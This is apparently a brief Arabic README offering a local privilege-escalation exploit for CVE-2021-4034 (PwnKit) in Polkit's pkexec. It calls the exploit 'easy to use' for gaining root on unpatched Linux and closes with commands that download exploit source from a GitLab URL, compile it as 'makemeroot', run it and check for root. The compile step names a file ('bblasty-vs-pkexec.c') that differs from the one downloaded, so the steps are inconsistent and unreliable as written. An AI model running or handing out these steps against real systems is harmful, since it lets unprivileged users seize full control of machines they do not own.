
استغلال تصعيد الامتيازات المحلية لثغرة CVE-2021-4034 (PWNKIT) التي تستهدف أداة pkexec في Polkit، مما يسمح للمستخدمين غير المصرح لهم بالحصول على صلاحيات الجذر (root) على أنظمة لينكس المعرضة للخطر.
CVE-2021-4034 (PWNKIT)
ثغرة تلف في الذاكرة في أداة pkexec الخاصة بـ Polkit، والتي تسمح لأي مستخدم غير مميز بالحصول على صلاحيات الجذر الكاملة على نظام ضعيف باستخدام إعدادات polkit الافتراضية.
سهلة الاستخدام، تصعيد صلاحيات محلي على أي نظام لينكس غير مُحدَّث.
wget https://gitlab.com/nelox/pwnkit-vulnerability/blasty-vs-pkexec.c
gcc bblasty-vs-pkexec.c -o makemeroot
./makemeroot
whoami